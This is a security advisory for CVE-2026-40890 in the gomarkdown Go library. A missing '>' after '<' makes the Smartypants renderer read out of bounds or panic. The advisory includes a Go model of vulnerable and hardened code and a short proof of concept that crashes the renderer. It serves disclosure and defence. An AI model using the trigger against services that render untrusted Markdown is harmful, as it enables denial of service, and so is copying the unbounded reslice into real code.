CVE-2026-40890
ADVISORY - github
Summary
Processing malformed input that contains a < character with no > character anywhere in the remaining text with a SmartypantsRenderer leads to an out-of-bounds read or a panic.
Details
The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text.
https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376
The function reslices the input one byte past its length. If the length of the slice is lower than its capacity, the reslice succeeds and one byte beyond the logical end of the input is read and copied to the output. If the length equals the capacity, the reslice fails a bounds check and the goroutine panics with "slice bounds out of range".
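The two outcomes described above, as an added example that is not the project's code: a simplified model of the scan-for-'>' pattern the advisory describes, next to a hardened variant that refuses to reslice past len(text). The helper withCap builds inputs with an exact capacity so both the panic (len == cap) and the one-byte over-read (len < cap) can be reproduced deterministically; the filler byte 'X' is constructed here to make the leaked byte visible.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

// ErrNoClosingAngle is returned by the hardened scanner when no '>' follows the '<'.
var ErrNoClosingAngle = errors.New("no closing '>' after '<'")

// unsafeLeftAngle models the vulnerable pattern (a simplified reconstruction,
// not the library's code): scan forward to the next '>' and copy the span,
// inclusive, to out. When no '>' exists the loop stops at i == len(text) and
// text[:i+1] reslices one byte past the input. A deferred recover turns the
// resulting runtime panic into an error so the caller can observe it.
func unsafeLeftAngle(out *bytes.Buffer, text []byte) (n int, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	i := 0
	for i < len(text) && text[i] != '>' {
		i++
	}
	out.Write(text[:i+1]) // i+1 may exceed len(text)
	return i, nil
}

// safeLeftAngle is the hardened variant: it locates '>' with a bounded search
// and never indexes beyond len(text). When the delimiter is missing it emits
// the input unchanged and reports the condition.
func safeLeftAngle(out *bytes.Buffer, text []byte) (int, error) {
	i := bytes.IndexByte(text, '>')
	if i < 0 {
		out.Write(text)
		return len(text), ErrNoClosingAngle
	}
	out.Write(text[:i+1])
	return i, nil
}

// withCap returns a slice holding s with capacity exactly c (c >= len(s)).
// The spare capacity is filled with filler so an over-read is recognisable.
func withCap(s string, c int, filler byte) []byte {
	full := bytes.Repeat([]byte{filler}, c)
	copy(full, s)
	return full[:len(s)]
}

// RunUnsafe runs the vulnerable scanner and returns what reached the output.
func RunUnsafe(text []byte) (string, error) {
	var buf bytes.Buffer
	_, err := unsafeLeftAngle(&buf, text)
	return buf.String(), err
}

// RunSafe runs the hardened scanner and returns what reached the output.
func RunSafe(text []byte) (string, error) {
	var buf bytes.Buffer
	_, err := safeLeftAngle(&buf, text)
	return buf.String(), err
}

func main() {
	tight := withCap("<a", 2, 'X') // len == cap: the reslice panics
	loose := withCap("<a", 3, 'X') // len < cap: the hidden 'X' is read

	for _, in := range [][]byte{tight, loose, []byte("<a>b")} {
		out, err := RunUnsafe(in)
		fmt.Printf("unsafe %q (len=%d cap=%d) -> %q err=%v\n", in, len(in), cap(in), out, err)
		out, err = RunSafe(in)
		fmt.Printf("safe   %q (len=%d cap=%d) -> %q err=%v\n", in, len(in), cap(in), out, err)
	}
}
```

Note that []byte("...") literals do not give a predictable capacity in Go (the runtime rounds small allocations up to a size class), which is why the PoC prints len and cap: the same input may panic or silently leak a byte depending on how the caller allocated the buffer. The fix is the same in both cases: bound the search by len(text) and never build a slice expression from an index the loop can push to len(text).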
PoC
```go
package main

import (
	"bytes"
	"fmt"

	"github.com/gomarkdown/markdown/html"
)

func main() {
	// A '<' with no '>' anywhere after it triggers the bug.
	src := []byte("<a")
	fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))

	var buf bytes.Buffer
	sp := html.NewSmartypantsRenderer(html.Smartypants)
	sp.Process(&buf, src) // panics: slice bounds out of range
	fmt.Printf("Output: %q\n", buf.String())
}
```
Impact
This vulnerability leads to a denial of service: any service that renders attacker-controlled Markdown with the Smartypants extension enabled can be made to panic on a single malformed input.
-- The Datadog Security Team